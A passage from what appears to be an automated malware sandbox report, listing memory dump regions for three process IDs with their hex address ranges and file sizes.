                                                                                                              Filesize

                                                                                                              436KB

                                                                                                            • memory/1720-143-0x0000000004FB0000-0x000000000603E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-51-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-50-0x0000000000480000-0x0000000000482000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/3368-120-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                              Filesize

                                                                                                              184KB

                                                                                                            • memory/3368-111-0x0000000000480000-0x0000000000482000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/3368-105-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-102-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-13-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                              Filesize

                                                                                                              184KB

                                                                                                            • memory/3368-30-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-101-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-35-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-34-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-40-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-41-0x0000000000480000-0x0000000000482000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/3368-42-0x0000000003350000-0x0000000003351000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/3368-36-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-106-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-39-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-44-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-59-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/3368-69-0x00000000021F0000-0x000000000327E000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.6MB

                                                                                                            • memory/4204-99-0x0000000005630000-0x000000000563A000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/4204-194-0x00000000081D0000-0x0000000008288000-memory.dmp

                                                                                                              Filesize

                                                                                                              736KB

                                                                                                            • memory/4204-195-0x0000000004AA0000-0x0000000004B14000-memory.dmp

                                                                                                              Filesize

                                                                                                              464KB

                                                                                                            • memory/4204-47-0x0000000005100000-0x0000000005101000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4204-53-0x0000000002A70000-0x0000000002A72000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4204-52-0x0000000005320000-0x00000000053B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/4204-43-0x00000000056F0000-0x0000000005C94000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.6MB

                                                                                                            • memory/4204-38-0x00000000006D0000-0x00000000007BC000-memory.dmp

                                                                                                              Filesize

                                                                                                              944KB

                                                                                                            • memory/4204-104-0x0000000007EE0000-0x0000000007F7C000-memory.dmp

                                                                                                              Filesize

                                                                                                              624KB

                                                                                                            • memory/4204-28-0x0000000072BCE000-0x0000000072BCF000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4204-103-0x0000000007E20000-0x0000000007E2A000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB